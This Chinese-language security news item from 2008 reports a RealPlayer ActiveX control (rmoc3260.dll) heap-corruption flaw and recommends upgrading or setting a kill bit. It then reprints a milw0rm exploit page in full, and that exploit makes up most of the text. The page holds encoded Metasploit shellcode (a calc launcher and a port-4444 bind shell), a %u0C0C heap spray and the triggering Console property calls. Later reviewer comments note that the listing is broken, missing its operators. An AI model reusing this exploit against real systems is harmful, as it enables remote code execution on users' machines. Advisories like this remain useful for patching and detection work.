RealPlayer又曝新漏洞
摘要:RealPlayer的漏洞问题越来越严重,milw0rm在昨天再次发布了一个RealPlayer控件溢出漏洞。在环境Windows XP SP2...

RealPlayer的漏洞问题越来越严重,milw0rm昨天又公布了一个RealPlayer ActiveX控件溢出漏洞的利用代码。该代码在Windows XP SP2(fully patched)English、IE6环境下测试,可成功运行calc(计算器)。

该漏洞存在于rmoc3260.dll中,目前只有6.0.10.45这一版本的DLL能被成功利用。

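在最新版本以及更早的旧版本上,该利用代码均无法成功执行;但利用代码未能成功并不等于这些版本已确认不受影响,应以厂商公告为准。该DLL版本对应的RealPlayer版本号为6.0.14.748,请使用6.0.14.748版本的用户尽快升级到新版本。暂时无法升级时,可在IE中为该控件的CLSID(见下文代码中的classid)设置Kill Bit,阻止浏览器加载该控件。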

发布日期:2008-4-2

最后更新日期:2008-4-2 12:37(GMT)

real又报新洞。。。漏洞组件rmoc3260.dll版本6.0.10.45

程序代码

<!--

Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)

written by e.b.

Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45

Thanks to h.d.m. and the Metasploit crew

-->

<html>

<head>

<title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>

<script language="JavaScript" defer>

// Check() is the body of the published proof-of-concept; the page's <body onload>
// handler calls it. As visible below it (1) defines two encoded payload strings,
// (2) stores 400 large strings built from a repeated %u0C0C filler plus shellcode1
// in an array, and (3) reads and writes the Console property of the ActiveX object
// whose id is "obj".
// NOTE(review): the listing as published on this page does not parse as JavaScript;
// it is kept byte-for-byte for reference and is not repaired here.
// Defensive context: the article names rmoc3260.dll 6.0.10.45 as the affected build.
// Upgrading RealPlayer, or blocking the control's CLSID in IE (kill bit), are the
// usual mitigations for a flaw in an ActiveX control.
function Check() {

// win32_exec - EXITFUNC=seh CMD=c:windowssystem32calc.exe Size=378 Encoder=Alpha2 http://metasploit.com

// First payload string; per the generator comment above it launches calc.exe.
// This is the only payload referenced later in the function.
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"

"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a"

"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241"

"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c"

"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"

"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f"

"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b"

"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c"

"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831"

"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"

"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b"

"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b"

"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44"

"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35"

"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"

"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b"

"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c"

"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63"

"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f"

"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"

"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f"

"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035"

"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653"

"%u314e%u7475%u7038%u7765%u4370");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com

// Second payload string; per the generator comment above it binds to port 4444.
// NOTE(review): shellcode2 is never referenced after this assignment; only
// shellcode1 is used below.
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"

"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"

"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"

"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"

"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"

"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"

"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"

"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"

"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"

"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"

"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"

"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"

"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"

"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"

"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"

"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"

"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"

"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"

"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"

"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"

"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"

"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"

"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"

"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"

"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"

"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"

"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"

"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"

"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"

"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"

"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"

"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"

"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"

"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"

"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"

"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"

"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"

"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"

"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"

"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"

"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"

"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"

"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"

"%u684f%u3956%u386f%u4350");

// Filler pattern and size bookkeeping for the large strings stored in memory[] below.
// For content scanners: script that builds very large strings from a repeated
// unescape("%u0C0C%u0C0C") filler is a widely used heap-spray indicator.
var bigblock = unescape("%u0C0C%u0C0C");

var headersize = 20;

var slackspace = headersize shellcode1.length;

while (bigblock.length < slackspace) bigblock = bigblock;

var fillblock = bigblock.substring(0,slackspace);

var block = bigblock.substring(0,bigblock.length - slackspace);

while (block.length slackspace < 0x40000) block = block block fillblock;

// 400 array slots each receive a string made from block and shellcode1.
// Note that i is not declared with var, so it is an implicit global.
var memory = new Array();

for (i = 0; i < 400; i ){ memory[i] = block shellcode1 }

// buf is grown until it is at least 32 characters long.
var buf = '';

while (buf.length < 32) buf = buf unescape(" ");

// The control's Console property is read into m, overwritten with buf, then set
// back to m; the same three steps are then repeated once more.
// NOTE(review): the listing's title attributes the heap corruption to rmoc3260.dll;
// presumably this property sequence is what exercises it - confirm against the
// vendor advisory.
var m = '';

m = obj.Console;

obj.Console = buf;

obj.Console = m;

m = obj.Console;

obj.Console = buf;

obj.Console = m;

}

</script>

</head>

<body onload="JavaScript: return Check();">

<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">

Unable to create object

</object>

</body>

</html>
